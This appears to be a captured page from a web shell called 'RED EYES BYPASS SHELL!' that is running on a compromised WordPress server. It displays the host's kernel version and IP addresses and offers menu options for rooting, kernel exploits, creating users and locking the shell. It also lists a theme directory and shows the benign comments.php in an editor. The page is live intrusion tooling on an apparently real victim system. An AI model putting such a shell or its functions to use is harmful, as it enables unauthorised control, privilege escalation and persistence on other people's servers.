Linux sothorn202 5.15.0-164-generic #174-Ubuntu SMP Fri Nov 14 20:25:16 UTC 2025 x86_64
Apache/2.4.52 (Ubuntu)
: 202.28.82.202 | : 216.73.216.9
pkexec version 0.105
Cant Read [ /etc/named.conf ]
iqtd
RED EYES BYPASS SHELL!
Terminal
Auto Root
Adminer
Backdoor Destroyer
Kernel Exploit
Lock Shell
Lock File
Create User
+ Create Folder
+ Create File
/
home /
wp900 /
Test_FMS /
wp-content /
themes /
blocksy /
[ HOME SHELL ]
NAME
SIZE
PERMISSION
ACTION
admin
[ DIR ]
drwxr-xr-x
inc
[ DIR ]
drwxr-xr-x
languages
[ DIR ]
drwxr-xr-x
static
[ DIR ]
drwxr-xr-x
template-parts
[ DIR ]
drwxr-xr-x
tutor
[ DIR ]
drwxr-xr-x
woocommerce
[ DIR ]
drwxr-xr-x
404.php
662
B
-rw-r--r--
LICENSE
17.62
KB
-rw-r--r--
archive.php
344
B
-rw-r--r--
changelog.txt
172.5
KB
-rw-r--r--
comments.php
2.53
KB
-rw-r--r--
footer.php
527
B
-rw-r--r--
functions.php
326
B
-rw-r--r--
gulpfile.js
15.66
KB
-rw-r--r--
header.php
1.36
KB
-rw-r--r--
index.php
466
B
-rw-r--r--
package.json
2.8
KB
-rw-r--r--
page.php
395
B
-rw-r--r--
readme.txt
7.32
KB
-rw-r--r--
screenshot.jpg
363.97
KB
-rw-r--r--
searchform.php
8.51
KB
-rw-r--r--
sidebar.php
409
B
-rw-r--r--
single.php
358
B
-rw-r--r--
style.css
1.39
KB
-rw-r--r--
theme.json
1.41
KB
-rw-r--r--
wpml-config.xml
4.06
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : comments.php
<?php /** * The template for displaying comments * * This is the template that displays the area of the page that contains both the current comments * and the comment form. * * @link https://developer.wordpress.org/themes/basics/template-hierarchy/ * * @package Blocksy */ if ( post_password_required() ) { return; } $entity_singular = 'comment'; $entity_plural = 'comments'; $commenter = wp_get_current_commenter(); $prefix = blocksy_manager()->screen->get_prefix(); $comments_position = blocksy_get_theme_mod($prefix . '_comments_position', 'below'); do_action('blocksy:comments:before'); $html_atts = [ 'class' => 'ct-comments', 'id' => 'comments' ]; if (blocksy_get_theme_mod( $prefix . '_comments_containment', 'separated' ) === 'contained' ) { $html_atts['class'] .= ' ct-constrained-width'; } ?> <div <?php echo blocksy_attr_to_html($html_atts); ?>> <?php do_action('blocksy:comments:top'); ?> <?php if ( have_comments() ) : ?> <h3 class="ct-comments-title"> <?php comments_number( esc_html__( 'No comments yet', 'blocksy' ), __( 'One comment', 'blocksy' ), __( '% Comments', 'blocksy' ) ); ?> </h3> <?php endif; // have_comments() ?> <?php if ( $comments_position === 'above' ) comment_form(); ?> <?php if ( have_comments() ) : ?> <ol class="ct-comment-list"> <?php wp_list_comments( [ 'short_ping' => true, 'avatar_size' => 100, 'callback' => 'blocksy_custom_comment_template', 'end-callback' => function () { echo '</li>'; } ] ); ?> </ol> <?php // Are there comments to navigate through? if (get_comment_pages_count() > 1 && get_option('page_comments')) : ?> <nav class="ct-comment-navigation-container"> <h4 class="screen-reader-text section-heading"> <?php esc_html_e( 'Comment navigation', 'blocksy' ); ?> </h4> <div class="ct-comments-navigation"> <span class="prev"> <?php previous_comments_link( __( '← Older Comments', 'blocksy' ) ); ?> </span> <span class="next"> <?php next_comments_link( __( 'Newer Comments →', 'blocksy' ) ); ?> </span> </div> </nav> <?php endif; // Check for comment navigation ?> <?php if (! comments_open() && get_comments_number()) : ?> <p class="no-comments"> <?php esc_html_e( 'Comments are closed.', 'blocksy' ); ?> </p> <?php endif; ?> <?php endif; // have_comments() ?> <?php if ( $comments_position === 'below' ) comment_form(); ?> <?php do_action('blocksy:comments:bottom'); ?> </div> <?php do_action('blocksy:comments:after'); ?>
Close